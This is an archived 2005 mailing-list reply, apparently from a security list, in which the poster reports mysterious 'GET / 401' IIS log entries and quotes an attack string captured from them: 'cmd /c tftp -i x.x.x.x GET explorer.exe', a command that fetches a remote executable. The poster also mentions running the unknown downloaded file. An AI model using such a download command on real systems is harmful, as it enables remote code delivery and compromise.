Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
Re: Re: New http attack?
Date: Sun Jun 19 2005 - 17:14:59 CDT
saw your post after considerable searching for the same mysterious 'get / 401' errors in my IIS log. I managed to get a full capture of the communication, further down from the 'QUFB' repetition was an embedded string:
cmd /c tftp -i x.x.x.x GET explorer.exe
have hidden IP for obvious reasons. I managed to download the file myself manually, and submitted to symantec, as my virus checker didnt flag it. incidentally, i ran the file, and it wasn't explorer, though i dont know what it is.